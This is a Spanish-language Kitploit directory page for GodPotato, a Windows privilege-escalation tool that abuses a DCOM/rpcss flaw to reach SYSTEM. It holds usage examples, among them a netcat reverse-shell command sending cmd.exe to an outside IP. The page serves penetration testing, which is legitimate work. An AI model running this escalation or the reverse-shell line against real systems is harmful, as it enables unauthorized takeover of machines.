Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
GodPotato — Herramienta de escalada de privilegios basada en DCOM para Windows Server 2012-2022 y Windows 8-11, elevando usuarios con ImpersonatePrivilege a NT AUTHORITY\SYSTEM a través de la vulnerabilidad rpcss oxid. | Kitploit
Herramientas/GitHubGitHub/beichendream/godpotato
Escalada de PrivilegiosExplotaciónPost-ExplotaciónPruebas de Penetración
GitHubbeichendream/godpotato

GodPotato

Herramienta de escalada de privilegios basada en DCOM para Windows Server 2012-2022 y Windows 8-11, elevando usuarios con ImpersonatePrivilege a NT AUTHORITY\SYSTEM a través de la vulnerabilidad rpcss oxid.

Ver Repositorio
2.3k273hace 2 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

GodPotato

Basado en la historia de la escalada de privilegios Potato durante 6 años, desde el principio de RottenPotato hasta el final de JuicyPotatoNG, descubrí una nueva tecnología al investigar DCOM, que permite la escalada de privilegios en Windows 2012 - Windows 2022, ahora siempre que tengas permiso "ImpersonatePrivilege". Entonces eres "NT AUTHORITY\SYSTEM", normalmente los servicios WEB y de bases de datos tienen permisos "ImpersonatePrivilege".

La escalada de privilegios Potato se usa generalmente cuando obtenemos privilegios WEB/bases de datos. Podemos elevar un usuario de servicio con bajos privilegios a privilegios "NT AUTHORITY\SYSTEM". Sin embargo, el histórico Potato no tiene forma de ejecutarse en el sistema Windows más reciente. Cuando investigaba DCOM, encontré un nuevo método que puede realizar escalada de privilegios. Hay algunos defectos en rpcss al tratar con oxid, y rpcss es un servicio que debe ser abierto por el sistema. , por lo que puede ejecutarse en casi cualquier sistema operativo Windows, lo llamé GodPotato

Versión afectada

Windows Server 2012 - Windows Server 2022 Windows8 - Windows 11

Ejemplo

root@kitploit:~

    FFFFF                   FFF  FFFFFFF
   FFFFFFF                  FFF  FFFFFFFF
  FFF  FFFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
  FFF   FFF                 FFF  FFF   FFF             FFF                  FFF
 FFFF        FFFFFFF   FFFFFFFF  FFF   FFF  FFFFFFF  FFFFFFFFF   FFFFFF  FFFFFFFFF    FFFFFF
 FFFF       FFFF FFFF  FFF FFFF  FFF  FFFF FFFF FFFF   FFF      FFF  FFF    FFF      FFF FFFF
 FFFF FFFFF FFF   FFF FFF   FFF  FFFFFFFF  FFF   FFF   FFF      F    FFF    FFF     FFF   FFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF         FFFFF    FFF     FFF   FFFF
 FFFF   FFF FFF   FFFFFFF   FFF  FFF      FFFF   FFF   FFF      FFFFFFFF    FFF     FFF   FFFF
  FFF   FFF FFF   FFF FFF   FFF  FFF       FFF   FFF   FFF     FFFF  FFF    FFF     FFF   FFFF
  FFFF FFFF FFFF  FFF FFFF  FFF  FFF       FFF  FFFF   FFF     FFFF  FFF    FFF     FFFF  FFF
   FFFFFFFF  FFFFFFF   FFFFFFFF  FFF        FFFFFFF     FFFFFF  FFFFFFFF    FFFFFFF  FFFFFFF
    FFFFFFF   FFFFF     FFFFFFF  FFF         FFFFF       FFFFF   FFFFFFFF     FFFF     FFFF


Argumentos:

        -cmd Requerido:True LíneaDeComandos (por defecto cmd /c whoami)

Ejemplo:

GodPotato -cmd "cmd /c whoami"


Use el Clsid integrado del programa para la escalada de privilegios y ejecute un comando simple

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Personalice Clsid y ejecute comandos

root@kitploit:~
GodPotato -cmd "cmd /c whoami"

Ejecute comandos de shell inversa

root@kitploit:~
GodPotato -cmd "nc -t -e C:\Windows\System32\cmd.exe 192.168.1.102 2012"

Agradecimientos

zcgonvh

skay

Licencia

Apache License 2.0

Descargar herramienta